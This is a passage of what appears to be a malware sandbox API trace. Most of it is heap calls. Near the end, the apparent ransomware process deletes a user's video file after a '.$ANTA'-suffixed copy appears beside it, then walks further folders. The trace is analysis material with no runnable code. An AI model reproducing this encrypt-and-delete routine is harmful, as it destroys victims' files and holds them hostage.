hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0100.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0100.984] PeekMessageW (in: lpMsg=0x144e7a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7a4) returned 0 [0100.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0100.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0100.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0100.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0100.985] FreeLibrary (hLibModule=0x756e0000) returned 1 [0100.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0100.985] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0100.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0100.985] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0100.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0100.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.985] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0100.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0100.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0100.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0100.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.986] CloseHandle (hObject=0x298) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ed3b0 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0100.986] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0100.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0100.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0100.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0100.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0100.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0100.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0100.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0100.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0100.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0100.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0100.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0100.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0100.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0100.987] CloseHandle (hObject=0x258) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0100.996] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0100.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0100.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0100.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0100.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0100.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0100.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0100.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0100.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0100.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0100.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0100.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0100.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0100.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0100.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0100.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0100.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0100.999] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\0l3d58qA0oi.mp4", nBufferLength=0x7fff, lpBuffer=0x143ece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\0l3d58qA0oi.mp4", lpFilePart=0x0) returned 0x42 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0100.999] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\0l3d58qA0oi.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\0l3d58qa0oi.mp4")) returned 0x20 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0100.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e4f0 [0100.999] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\0l3d58qA0oi.mp4", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11566390, ftCreationTime.dwHighDateTime=0x1d5f028, ftLastAccessTime.dwLowDateTime=0xe65173c0, ftLastAccessTime.dwHighDateTime=0x1d5ed97, ftLastWriteTime.dwLowDateTime=0xe65173c0, ftLastWriteTime.dwHighDateTime=0x1d5ed97, nFileSizeHigh=0x0, nFileSizeLow=0xb24b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="0l3d58qA0oi.mp4", cAlternateFileName="0L3D58~1.MP4")) returned 0x41ac140 [0100.999] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\0l3d58qA0oi.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\0l3d58qa0oi.mp4")) returned 1 [0101.044] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11566390, ftCreationTime.dwHighDateTime=0x1d5f028, ftLastAccessTime.dwLowDateTime=0xe65173c0, ftLastAccessTime.dwHighDateTime=0x1d5ed97, ftLastWriteTime.dwLowDateTime=0xe65173c0, ftLastWriteTime.dwHighDateTime=0x1d5ed97, nFileSizeHigh=0x0, nFileSizeLow=0xb24b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="0l3d58qA0oi.mp4", cAlternateFileName="0L3D58~1.MP4")) returned 0 [0101.044] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0101.045] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0101.045] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx")) returned 0x10 [0101.045] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\*", lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bc1e70, ftCreationTime.dwHighDateTime=0x1d5e767, ftLastAccessTime.dwLowDateTime=0x85d1375, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x85d1375, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca358, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0101.045] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bc1e70, ftCreationTime.dwHighDateTime=0x1d5e767, ftLastAccessTime.dwLowDateTime=0x85d1375, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x85d1375, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca358, cFileName="..", cAlternateFileName="")) returned 1 [0101.045] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82fc713, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x82fc713, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x8562703, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xb250, dwReserved0=0x0, dwReserved1=0x43ca358, cFileName="0l3d58qA0oi.mp4.$ANTA", cAlternateFileName="0L3D58~1.$AN")) returned 1 [0101.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0101.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0101.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0101.045] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83ec870, ftCreationTime.dwHighDateTime=0x1d5efe1, ftLastAccessTime.dwLowDateTime=0x8ae48190, ftLastAccessTime.dwHighDateTime=0x1d5ee3b, ftLastWriteTime.dwLowDateTime=0x8ae48190, ftLastWriteTime.dwHighDateTime=0x1d5ee3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="jyNO5NcyIG2nrd", cAlternateFileName="JYNO5N~1")) returned 1 [0101.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0101.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0101.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0101.045] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ba5f170, ftCreationTime.dwHighDateTime=0x1d5e1c0, ftLastAccessTime.dwLowDateTime=0xad79bf20, ftLastAccessTime.dwHighDateTime=0x1d5e96a, ftLastWriteTime.dwLowDateTime=0xad79bf20, ftLastWriteTime.dwHighDateTime=0x1d5e96a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="pNrmbcA", cAlternateFileName="")) returned 1 [0101.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0101.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0101.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0101.046] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c1344d0, ftCreationTime.dwHighDateTime=0x1d5e0cc, ftLastAccessTime.dwLowDateTime=0x94b072b0, ftLastAccessTime.dwHighDateTime=0x1d5eacb, ftLastWriteTime.dwLowDateTime=0x94b072b0, ftLastWriteTime.dwHighDateTime=0x1d5eacb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="tr4gQM", cAlternateFileName="")) returned 1 [0101.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0101.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0101.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0101.046] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2700, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0xf, 